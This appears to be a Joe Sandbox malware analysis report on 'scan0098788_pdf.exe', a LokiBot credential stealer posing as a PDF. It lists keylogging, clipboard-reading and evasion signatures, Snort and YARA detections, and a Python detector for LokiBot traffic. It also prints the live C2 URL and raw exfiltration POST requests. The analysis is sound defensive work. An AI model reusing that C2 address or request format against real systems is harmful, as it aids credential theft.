
Analysis Report scan0098788_pdf.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 219229
Start date: 31.03.2020
Start time: 16:46:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: scan0098788_pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spyw.evad.winEXE@5/2@0/1
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 97.9% (good quality ratio 93.9%)
  • Quality average: 77.2%
  • Quality standard deviation: 28.5%
HCA Information:
  • Successful, ratio: 63%
  • Number of executed functions: 52
  • Number of non-executed functions: 247
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Execution Graph export aborted for target scan0098788_pdf.exe, PID 920 because there are no executed function
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: Lokibot
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Techniques are listed per tactic column; the number in parentheses is the count shown next to the technique in the matrix, techniques without a number had no matching signature.

Initial Access: Valid Accounts (2), Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service, Supply Chain Compromise
Execution: Execution through API (1), Graphical User Interface (2), Windows Management Instrumentation, Scheduled Task, Command-Line Interface, Graphical User Interface, Scripting, Third-party Software, Rundll32
Persistence: Valid Accounts (2), Application Shimming (1), Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts, DLL Search Order Hijacking
Privilege Escalation: Exploitation for Privilege Escalation (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (112), Application Shimming (1), New Service, Scheduled Task, Process Injection, Service Registry Permissions Weakness
Defense Evasion: Disabling Security Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Masquerading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (1), Access Token Manipulation (21), Process Injection (112), Process Injection
Credential Access: Credential Dumping (2), Input Capture (21), Credentials in Registry (2), Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History, Input Prompt
Discovery: System Time Discovery (2), Account Discovery (1), Security Software Discovery (31), File and Directory Discovery (2), System Information Discovery (27), Virtualization/Sandbox Evasion (1), Process Discovery (2), Application Window Discovery (1), System Owner/User Discovery (1)
Lateral Movement: Remote File Copy (1), Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol, Windows Admin Shares
Collection: Man in the Browser (1), Data from Local System (2), Email Collection (1), Input Capture (21), Clipboard Data (2), Screen Capture, Email Collection, Clipboard Data, Automated Collection
Exfiltration: Data Encrypted (1), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Physical Medium
Command and Control: Remote File Copy (1), Standard Cryptographic Protocol (1), Standard Non-Application Layer Protocol (1), Standard Application Layer Protocol (11), Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol, Multilayer Encryption
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1), Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction

Signature Overview



AV Detection:

Found malware configuration
Source: scan0098788_pdf.exe.1044.3.memstr; Malware Configuration Extractor: Lokibot {"c2:": "http://108.170.31.41/dozlogs/logs/fre.php"}
Multi AV Scanner detection for submitted file
Source: scan0098788_pdf.exe; ReversingLabs: Detection: 41%

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 0_2_00F4449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F4449B
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F4449B GetFileAttributesW,FindFirstFileW,FindClose,2_2_00F4449B
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F4C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00F4C7E8
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F4C75D FindFirstFileW,FindClose,2_2_00F4C75D
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F4F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00F4F021
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F4F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00F4F17E
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F4F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00F4F47F
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F43833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00F43833
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F43B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00F43B56
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 2_2_00F4BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00F4BD48
Source: C:\Users\user\Desktop\scan0098788_pdf.exe; Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49746 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49746 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49747 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49747 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49748
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 108.170.31.41:80
Source: Traffic; Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 108.170.31.41:80 -> 192.168.2.5:49749
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication (note: "Mozilla/4.08 (Charon; Inferno)" is not a real browser string but the User-Agent LokiBot hard-codes, which is why ET 2021641 above fires on it)
Source: global traffic | HTTP traffic detected: 43 POST requests to the same URL, identical apart from the body size (2 with Content-Length 176, then 41 with Content-Length 149):
POST /dozlogs/logs/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 108.170.31.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 77A6CCB6
Content-Length: 176
Connection: close
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 108.170.31.41 (50 connections; the C2 is addressed by literal IP, so no DNS resolution precedes them)
Contains functionality to download additional files from the internet
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F52404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Posts data to webserver
Source: unknown | HTTP traffic detected:
POST /dozlogs/logs/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 108.170.31.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 77A6CCB6
Content-Length: 176
Connection: close
Urls found in memory or binary data
Source: scan0098788_pdf.exe, 00000000.00000002.816530899.0000000006AFF000.00000040.00000001.sdmp; scan0098788_pdf.exe, 00000003.00000002.1171632363.0000000000590000.00000004.00000020.sdmp | String found in binary or memory: http://108.170.31.41/dozlogs/logs/fre.php
Source: scan0098788_pdf.exe; scan0098788_pdf.exe, 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
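The network findings above (LokiBot check-in headers, and TCP connections to an IP no DNS answer resolved) are straightforward to reproduce outside the sandbox. The following Python is an added example written for this page, not code from Joe Sandbox, Emerging Threats or the sample: it parses raw HTTP requests and applies the traits the ET 2021641/2025381 signatures key on (HTTP/1.0 POST, the Charon/Inferno User-Agent, a binary octet-stream body, a Content-Key header), and it flags destination IPs that never appeared in a DNS answer. Every request, DNS record and connection in the block is constructed for the example; the LokiBot request copies the headers observed in this report with a dummy body.

```python
"""LokiBot network detection, added example for this report (not sandbox code).

Re-implements the two network checks the report relies on:
1. LokiBot-style check-in: HTTP/1.0 POST, User-Agent "Mozilla/4.08 (Charon;
   Inferno)", application/octet-stream body with Content-Encoding: binary,
   and a Content-Key header.
2. TCP connection to a destination IP that no DNS answer in the capture
   resolved ("without corresponding DNS query").
All inputs below are constructed for the example.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: Dict[str, str]  # header names lower-cased
    body: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Parse one raw HTTP request: request line, CRLF headers, blank line, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, version, headers, body)


def lokibot_checkin_reasons(req: HttpRequest) -> List[str]:
    """Return the LokiBot traits a request exhibits (empty list = no match).

    The User-Agent alone is a strong indicator; the other two checks keep the
    match useful against a build that changes the UA but not the C2 protocol.
    """
    reasons = []
    if req.headers.get("user-agent") == LOKIBOT_UA:
        reasons.append("charon-inferno-user-agent")
    if req.method == "POST" and req.version == "HTTP/1.0" and "content-key" in req.headers:
        reasons.append("http10-post-with-content-key")
    if (req.headers.get("content-type") == "application/octet-stream"
            and req.headers.get("content-encoding") == "binary"):
        reasons.append("binary-octet-stream-body")
    return reasons


def connections_without_dns(dns_answers: Iterable[Tuple[str, str]],
                            connections: Iterable[str]) -> List[str]:
    """Destination IPs that were connected to but never returned by a DNS answer.

    dns_answers: (query name, answered IP) pairs seen in the capture.
    connections: destination IPs of TCP connections in the capture.
    """
    resolved = {ip for _, ip in dns_answers}
    return sorted({ip for ip in connections if ip not in resolved})


# Constructed inputs. The first request copies the check-in headers from the
# report (176-byte first beacon); the body bytes are dummies.
LOKIBOT_REQUEST = (
    b"POST /dozlogs/logs/fre.php HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: 108.170.31.41\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: 77A6CCB6\r\n"
    b"Content-Length: 176\r\n"
    b"Connection: close\r\n\r\n" + b"\x00" * 176
)
BENIGN_REQUEST = (  # ordinary binary upload from a real browser, for contrast
    b"POST /api/upload HTTP/1.1\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    b"Host: files.example.test\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 3\r\n\r\nabc"
)
DNS_ANSWERS = [("files.example.test", "203.0.113.10")]  # constructed
CONNECTIONS = ["203.0.113.10", "108.170.31.41", "108.170.31.41"]  # constructed


def analyze_capture() -> Dict[str, object]:
    """Run both checks over the constructed capture and return the findings."""
    return {
        "lokibot": lokibot_checkin_reasons(parse_request(LOKIBOT_REQUEST)),
        "benign": lokibot_checkin_reasons(parse_request(BENIGN_REQUEST)),
        "no_dns": connections_without_dns(DNS_ANSWERS, CONNECTIONS),
    }


if __name__ == "__main__":
    for name, finding in analyze_capture().items():
        print(f"{name}: {finding}")
```

The URL path (/dozlogs/logs/fre.php) is deliberately not used as a trait: it is chosen per campaign by the operator, whereas the User-Agent, HTTP/1.0 POST and Content-Key header come from the bot itself and survive across samples.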

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F5407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F5407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW
Potential key logger detected (key state polling based). Caveat: the GetKeyState calls below sit in a dialog/list-view handler (DefDlgProcW, ImageList_BeginDrag, TrackPopupMenuEx) inside the same module as the compiled AutoIt stub (cf. 0_2_00EE3B4C), not in the unpacked LokiBot payload (3.2.scan0098788_pdf.exe.400000.0.unpack), so this signature reflects the AutoIt GUI runtime rather than the payload's credential theft.
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F6CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F6CB26 (same function in process 2, identical API sequence)

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.790188914.0000000005591000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.807797640.00000000057D7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.787230238.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.785230005.00000000055F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.785335673.000000000568C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.757905408.00000000057D7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
Source: 00000000.00000003.791806641.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.757815096.000000000568C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.785273546.000000000562C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.787472385.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.789332429.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.791179991.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.789421483.00000000060B4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE3B4C: This is a third-party compiled AutoIt script.
Source: scan0098788_pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: scan0098788_pdf.exe, 00000000.00000002.812818039.0000000000F6F000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00EE3B4C: This is a third-party compiled AutoIt script.
Source: scan0098788_pdf.exe, 00000002.00000000.783147503.0000000000F6F000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
Source: scan0098788_pdf.exe, 00000003.00000002.1172299564.0000000000F6F000.00000002.00020000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: scan0098788_pdf.exe, 00000003.00000002.1172299564.0000000000F6F000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
Source: scan0098788_pdf.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
Initial sample is a PE file and has a suspicious name (double extension mimicking a scanned PDF)
Source: initial sample | Static PE information: Filename: scan0098788_pdf.exe
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F4A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F38638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F45264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Detected potential crypto function
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code functions, process 0 (16): 0_2_00EEE060, 0_2_00EEE800, 0_2_00EEFE40, 0_2_00EF70FE, 0_2_00EF6841, 0_2_00EF3190, 0_2_00EF8968, 0_2_00EF4140, 0_2_00F0DAF5, 0_2_00EE1287, 0_2_00F0CCA1, 0_2_00F16452, 0_2_00F01604, 0_2_00F67E0D, 0_2_00F16F36, 0_2_00F0BF26
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code functions, process 2 (33): 2_2_00EEE060, 2_2_00EF4140, 2_2_00F02345, 2_2_00F60465, 2_2_00F16452, 2_2_00F125AE, 2_2_00F0277A, 2_2_00F608E2, 2_2_00EF6841, 2_2_00EEE800, 2_2_00F169C4, 2_2_00EF8968, 2_2_00F48932, 2_2_00F3E928, 2_2_00F1890F, 2_2_00F0CCA1, 2_2_00F16F36, 2_2_00EF70FE, 2_2_00EF3190, 2_2_00EE1287, 2_2_00F0F359, 2_2_00F03307, 2_2_00EF5680, 2_2_00F01604, 2_2_00EF58C0, 2_2_00F07813, 2_2_00F0DAF5, 2_2_00F01AF8, 2_2_00F19C35, 2_2_00EEFE40, 2_2_00F67E0D, 2_2_00F0BF26, 2_2_00F01F10
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code functions, process 3 (2, in the unpacked payload image at 0x400000): 3_2_0040549C, 3_2_004029D4
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F11AC0 appears 47 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00EE5A64 appears 32 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F00C63 appears 77 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F0394B appears 38 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F08A80 appears 69 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F09EF5 appears 35 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00EE7F41 appears 50 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 0041219C appears 45 times
PE file contains strange resources
Source: scan0098788_pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: scan0098788_pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: scan0098788_pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
